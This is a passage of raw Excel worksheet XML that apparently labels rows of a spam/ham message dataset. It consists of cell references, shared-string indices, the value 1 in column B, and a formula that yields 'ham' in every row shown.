        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="475" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A475" t="s">
        <v>342</v>
      </c>
      <c r="B475">
        <v>1</v>
      </c>
      <c r="C475" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="476" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A476" t="s">
        <v>21</v>
      </c>
      <c r="B476">
        <v>1</v>
      </c>
      <c r="C476" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="477" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A477" t="s">
        <v>343</v>
      </c>
      <c r="B477">
        <v>1</v>
      </c>
      <c r="C477" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="478" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A478" t="s">
        <v>344</v>
      </c>
      <c r="B478">
        <v>1</v>
      </c>
      <c r="C478" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="479" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A479" t="s">
        <v>345</v>
      </c>
      <c r="B479">
        <v>1</v>
      </c>
      <c r="C479" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="480" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A480" t="s">
        <v>21</v>
      </c>
      <c r="B480">
        <v>1</v>
      </c>
      <c r="C480" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="481" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A481" t="s">
        <v>346</v>
      </c>
      <c r="B481">
        <v>1</v>
      </c>
      <c r="C481" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="482" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A482" t="s">
        <v>347</v>
      </c>
      <c r="B482">
        <v>1</v>
      </c>
      <c r="C482" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="483" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A483" t="s">
        <v>348</v>
      </c>
      <c r="B483">
        <v>1</v>
      </c>
      <c r="C483" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="484" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A484" t="s">
        <v>349</v>
      </c>
      <c r="B484">
        <v>1</v>
      </c>
      <c r="C484" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="485" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A485" t="s">
        <v>350</v>
      </c>
      <c r="B485">
        <v>1</v>
      </c>
      <c r="C485" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="486" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A486" t="s">
        <v>351</v>
      </c>
      <c r="B486">
        <v>1</v>
      </c>
      <c r="C486" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="487" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A487" t="s">
        <v>21</v>
      </c>
      <c r="B487">
        <v>1</v>
      </c>
      <c r="C487" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="488" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A488" t="s">
        <v>352</v>
      </c>
      <c r="B488">
        <v>1</v>
      </c>
      <c r="C488" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="489" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A489" t="s">
        <v>353</v>
      </c>
      <c r="B489">
        <v>1</v>
      </c>
      <c r="C489" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A490" t="s">
        <v>354</v>
      </c>
      <c r="B490">
        <v>1</v>
      </c>
      <c r="C490" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="491" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A491" t="s">
        <v>355</v>
      </c>
      <c r="B491">
        <v>1</v>
      </c>
      <c r="C491" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="492" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A492" t="s">
        <v>356</v>
      </c>
      <c r="B492">
        <v>1</v>
      </c>
      <c r="C492" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="493" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A493" t="s">
        <v>356</v>
      </c>
      <c r="B493">
        <v>1</v>
      </c>
      <c r="C493" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="494" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A494" t="s">
        <v>357</v>
      </c>
      <c r="B494">
        <v>1</v>
      </c>
      <c r="C494" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="495" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A495" t="s">
        <v>358</v>
      </c>
      <c r="B495">
        <v>1</v>
      </c>
      <c r="C495" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="496" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A496" t="s">
        <v>359</v>
      </c>
      <c r="B496">
        <v>1</v>
      </c>
      <c r="C496" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="497" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A497" t="s">
        <v>360</v>
      </c>
      <c r="B497">
        <v>1</v>
      </c>
      <c r="C497" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="498" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A498" t="s">
        <v>361</v>
      </c>
      <c r="B498">
        <v>1</v>
      </c>
      <c r="C498" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="499" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A499" t="s">
        <v>21</v>
      </c>
      <c r="B499">
        <v>1</v>
      </c>
      <c r="C499" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="500" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A500" t="s">
        <v>362</v>
      </c>
      <c r="B500">
        <v>1</v>
      </c>
      <c r="C500" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="501" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A501" t="s">
        <v>363</v>
      </c>
      <c r="B501">
        <v>1</v>
      </c>
      <c r="C501" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="502" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A502" t="s">
        <v>364</v>
      </c>
      <c r="B502">
        <v>1</v>
      </c>
      <c r="C502" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="503" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A503" t="s">
        <v>21</v>
      </c>
      <c r="B503">
        <v>1</v>
      </c>
      <c r="C503" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="504" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A504" t="s">
        <v>21</v>
      </c>
      <c r="B504">
        <v>1</v>
      </c>
      <c r="C504" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="505" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A505" t="s">
        <v>21</v>
      </c>
      <c r="B505">
        <v>1</v>
      </c>
      <c r="C505" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="506" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A506" t="s">
        <v>21</v>
      </c>
      <c r="B506">
        <v>1</v>
      </c>
      <c r="C506" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="507" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A507" t="s">
        <v>21</v>
      </c>
      <c r="B507">
        <v>1</v>
      </c>
      <c r="C507" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="508" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A508" t="s">
        <v>365</v>
      </c>
      <c r="B508">
        <v>1</v>
      </c>
      <c r="C508" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="509" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A509" t="s">
        <v>366</v>
      </c>
      <c r="B509">
        <v>1</v>
      </c>
      <c r="C509" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="510" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A510" t="s">
        <v>21</v>
      </c>
      <c r="B510">
        <v>1</v>
      </c>
      <c r="C510" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="511" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A511" t="s">
        <v>367</v>
      </c>
      <c r="B511">
        <v>1</v>
      </c>
      <c r="C511" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="512" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A512" t="s">
        <v>368</v>
      </c>
      <c r="B512">
        <v>1</v>
      </c>
      <c r="C512" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="513" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A513" t="s">
        <v>369</v>
      </c>
      <c r="B513">
        <v>1</v>
      </c>
      <c r="C513" t="str">
        <f t="shared" si="7"/>
        <v>ham</v>
      </c>
    </row>
    <row r="514" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A514" t="s">
        <v>370</v>
      </c>
      <c r="B514">
        <v>1</v>
      </c>
      <c r="C514" t="str">
        <f t="shared" ref="C514:C577" si="8">IF(B514="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="515" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A515" t="s">
        <v>371</v>
      </c>
      <c r="B515">
        <v>1</v>
      </c>
      <c r="C515" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="516" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A516" t="s">
        <v>372</v>
      </c>
      <c r="B516">
        <v>1</v>
      </c>
      <c r="C516" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="517" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A517" t="s">
        <v>373</v>
      </c>
      <c r="B517">
        <v>1</v>
      </c>
      <c r="C517" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="518" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A518" t="s">
        <v>374</v>
      </c>
      <c r="B518">
        <v>1</v>
      </c>
      <c r="C518" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="519" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A519" t="s">
        <v>375</v>
      </c>
      <c r="B519">
        <v>1</v>
      </c>
      <c r="C519" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="520" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A520" t="s">
        <v>376</v>
      </c>
      <c r="B520">
        <v>1</v>
      </c>
      <c r="C520" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="521" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A521" t="s">
        <v>377</v>
      </c>
      <c r="B521">
        <v>1</v>
      </c>
      <c r="C521" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="522" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A522" t="s">
        <v>378</v>
      </c>
      <c r="B522">
        <v>1</v>
      </c>
      <c r="C522" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="523" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A523" t="s">
        <v>379</v>
      </c>
      <c r="B523">
        <v>1</v>
      </c>
      <c r="C523" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="524" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A524" t="s">
        <v>380</v>
      </c>
      <c r="B524">
        <v>1</v>
      </c>
      <c r="C524" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="525" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A525" t="s">
        <v>381</v>
      </c>
      <c r="B525">
        <v>1</v>
      </c>
      <c r="C525" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="526" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A526" t="s">
        <v>381</v>
      </c>
      <c r="B526">
        <v>1</v>
      </c>
      <c r="C526" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="527" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A527" t="s">
        <v>382</v>
      </c>
      <c r="B527">
        <v>1</v>
      </c>
      <c r="C527" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="528" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A528" t="s">
        <v>383</v>
      </c>
      <c r="B528">
        <v>1</v>
      </c>
      <c r="C528" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="529" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A529" t="s">
        <v>384</v>
      </c>
      <c r="B529">
        <v>1</v>
      </c>
      <c r="C529" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="530" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A530" t="s">
        <v>385</v>
      </c>
      <c r="B530">
        <v>1</v>
      </c>
      <c r="C530" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="531" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A531" t="s">
        <v>386</v>
      </c>
      <c r="B531">
        <v>1</v>
      </c>
      <c r="C531" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="532" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A532" t="s">
        <v>387</v>
      </c>
      <c r="B532">
        <v>1</v>
      </c>
      <c r="C532" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="533" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A533" t="s">
        <v>388</v>
      </c>
      <c r="B533">
        <v>1</v>
      </c>
      <c r="C533" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="534" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A534" t="s">
        <v>389</v>
      </c>
      <c r="B534">
        <v>1</v>
      </c>
      <c r="C534" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="535" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A535" t="s">
        <v>390</v>
      </c>
      <c r="B535">
        <v>1</v>
      </c>
      <c r="C535" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="536" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A536" t="s">
        <v>391</v>
      </c>
      <c r="B536">
        <v>1</v>
      </c>
      <c r="C536" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="537" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A537" t="s">
        <v>391</v>
      </c>
      <c r="B537">
        <v>1</v>
      </c>
      <c r="C537" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="538" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A538" t="s">
        <v>392</v>
      </c>
      <c r="B538">
        <v>1</v>
      </c>
      <c r="C538" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="539" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A539" t="s">
        <v>393</v>
      </c>
      <c r="B539">
        <v>1</v>
      </c>
      <c r="C539" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="540" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A540" t="s">
        <v>394</v>
      </c>
      <c r="B540">
        <v>1</v>
      </c>
      <c r="C540" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="541" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A541" t="s">
        <v>395</v>
      </c>
      <c r="B541">
        <v>1</v>
      </c>
      <c r="C541" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="542" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A542" t="s">
        <v>396</v>
      </c>
      <c r="B542">
        <v>1</v>
      </c>
      <c r="C542" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="543" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A543" t="s">
        <v>397</v>
      </c>
      <c r="B543">
        <v>1</v>
      </c>
      <c r="C543" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A544" t="s">
        <v>398</v>
      </c>
      <c r="B544">
        <v>1</v>
      </c>
      <c r="C544" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A545" t="s">
        <v>399</v>
      </c>
      <c r="B545">
        <v>1</v>
      </c>
      <c r="C545" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A546" t="s">
        <v>400</v>
      </c>
      <c r="B546">
        <v>1</v>
      </c>
      <c r="C546" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A547" t="s">
        <v>401</v>
      </c>
      <c r="B547">
        <v>1</v>
      </c>
      <c r="C547" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A548" t="s">
        <v>401</v>
      </c>
      <c r="B548">
        <v>1</v>
      </c>
      <c r="C548" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A549" t="s">
        <v>402</v>
      </c>
      <c r="B549">
        <v>1</v>
      </c>
      <c r="C549" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A550" t="s">
        <v>402</v>
      </c>
      <c r="B550">
        <v>1</v>
      </c>
      <c r="C550" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A551" t="s">
        <v>403</v>
      </c>
      <c r="B551">
        <v>1</v>
      </c>
      <c r="C551" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A552" t="s">
        <v>404</v>
      </c>
      <c r="B552">
        <v>1</v>
      </c>
      <c r="C552" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A553" t="s">
        <v>405</v>
      </c>
      <c r="B553">
        <v>1</v>
      </c>
      <c r="C553" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A554" t="s">
        <v>406</v>
      </c>
      <c r="B554">
        <v>1</v>
      </c>
      <c r="C554" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A555" t="s">
        <v>407</v>
      </c>
      <c r="B555">
        <v>1</v>
      </c>
      <c r="C555" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A556" t="s">
        <v>408</v>
      </c>
      <c r="B556">
        <v>1</v>
      </c>
      <c r="C556" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A557" t="s">
        <v>409</v>
      </c>
      <c r="B557">
        <v>1</v>
      </c>
      <c r="C557" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A558" t="s">
        <v>410</v>
      </c>
      <c r="B558">
        <v>1</v>
      </c>
      <c r="C558" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A559" t="s">
        <v>411</v>
      </c>
      <c r="B559">
        <v>1</v>
      </c>
      <c r="C559" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A560" t="s">
        <v>412</v>
      </c>
      <c r="B560">
        <v>1</v>
      </c>
      <c r="C560" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A561" t="s">
        <v>413</v>
      </c>
      <c r="B561">
        <v>1</v>
      </c>
      <c r="C561" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A562" t="s">
        <v>414</v>
      </c>
      <c r="B562">
        <v>1</v>
      </c>
      <c r="C562" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A563" t="s">
        <v>415</v>
      </c>
      <c r="B563">
        <v>1</v>
      </c>
      <c r="C563" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A564" t="s">
        <v>416</v>
      </c>
      <c r="B564">
        <v>1</v>
      </c>
      <c r="C564" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A565" t="s">
        <v>417</v>
      </c>
      <c r="B565">
        <v>1</v>
      </c>
      <c r="C565" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A566" t="s">
        <v>417</v>
      </c>
      <c r="B566">
        <v>1</v>
      </c>
      <c r="C566" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A567" t="s">
        <v>415</v>
      </c>
      <c r="B567">
        <v>1</v>
      </c>
      <c r="C567" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A568" t="s">
        <v>418</v>
      </c>
      <c r="B568">
        <v>1</v>
      </c>
      <c r="C568" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A569" t="s">
        <v>419</v>
      </c>
      <c r="B569">
        <v>1</v>
      </c>
      <c r="C569" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A570" t="s">
        <v>420</v>
      </c>
      <c r="B570">
        <v>1</v>
      </c>
      <c r="C570" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A571" t="s">
        <v>421</v>
      </c>
      <c r="B571">
        <v>1</v>
      </c>
      <c r="C571" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A572" t="s">
        <v>422</v>
      </c>
      <c r="B572">
        <v>1</v>
      </c>
      <c r="C572" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A573" t="s">
        <v>423</v>
      </c>
      <c r="B573">
        <v>1</v>
      </c>
      <c r="C573" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A574" t="s">
        <v>415</v>
      </c>
      <c r="B574">
        <v>1</v>
      </c>
      <c r="C574" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A575" t="s">
        <v>424</v>
      </c>
      <c r="B575">
        <v>1</v>
      </c>
      <c r="C575" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A576" t="s">
        <v>425</v>
      </c>
      <c r="B576">
        <v>1</v>
      </c>
      <c r="C576" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A577" t="s">
        <v>426</v>
      </c>
      <c r="B577">
        <v>1</v>
      </c>
      <c r="C577" t="str">
        <f t="shared" si="8"/>
        <v>ham</v>
      </c>
    </row>
    <row r="578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A578" t="s">
        <v>427</v>
      </c>
      <c r="B578">
        <v>1</v>
      </c>
      <c r="C578" t="str">
        <f t="shared" ref="C578:C641" si="9">IF(B578="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A579" t="s">
        <v>428</v>
      </c>
      <c r="B579">
        <v>1</v>
      </c>
      <c r="C579" t="str">
        <f t="shared" si="9"/>
        <v>ham</v>
      </c>
    </row>
    <row r="580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A580" t="s">
        <v>428</v>
      </c>
      <c r="B580">
        <v>1</v>
      </c>
      <c r="C580" t="str">
        <f t="shared" si="9"/>
        <v>ham</v>
      </c>
    </row>
    <row r="581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A581" t="s">
        <v>429</v>
      </c>
      <c r="B581">
        <v>1</v>
      </c>
      <c r="C581" t="str">
        <f t="shared" si="9"/>
        <v>ham</v>
      </c>
    </row>
    <row r="582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A582" t="s">
        <v>430</v>
      </c>
      <c r="B582">
        <v>1</v>
      </c>
      <c r="C582" t="str">
        <f t="shared" si="9"/>
        <v>ham</v>
      </c>
    </row>
    <row r="583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A583" t="s">
        <v>431</v>
      </c>
      <c r="B583">
        <v>1</v>
      </c>
      <c r="C583" t="str">
        <f t="shared" si="9"/>
        <v>ham</v>
      </c>
    </row>
    <row r="584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A584" t="s">
        <v>432</v>
      </c>
      <c r="B584">
        <v>1</v>
      </c>
      <c r="C584" t="str">
        <f t="shared" si="9"/>
        <v>ham</v>
      </c>
    </row>
    <row r="585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A585" t="s">
        <v>433</v>
      </c>
      <c r="B585">
        <v>1</v>
      </c>
      <c r="C585" t="str">
        <f t="shared" si="9"/>
        <v>ham</v>
      </c>
    </row>
    <row r="586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A586" t="s">
        <v>434</v>
      </c>
      <c r="B586">
        <v>1</v>
      </c>
      <c r="C586" t="str">
        <f t="shared" si="9"/>
        <v>ham</v>
      </c>
    </row>
    <row r="587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A587" t="s">
        <v>435</v>
      </c>
      <c r="B587">
        <v>1</v>
      </c>
      <c r="C587" t="str">
        <f t="shared" si="9"/>
        <v>ham</v>
      </c>
    </row>
    <row r="588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A588" t="s">
        <v>436</v>
      </c>
      <c r="B588">
        <v>1</v>
      </c>
      <c r="C588" t="str">
        <f t="shared" si="9"/>
        <v>ham</v>
      </c>
    </row>
    <row r="589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A589" t="s">
        <v>437</v>
      </c>
      <c r="B589">
        <v>1</v>
      </c>
      <c r="C589" t="str">
        <f t="shared" si="9"/>
        <v>ham</v>
      </c>
    </row>
    <row r="590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A590" t="s">
        <v>438</v>
      </c>
      <c r="B590">
        <v>1</v>
      </c>
      <c r="C590" t="str">
        <f t="shared" si="9"/>
        <v>ham</v>
      </c>
    </row>
    <row r="591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A591" t="s">
        <v>439</v>
      </c>
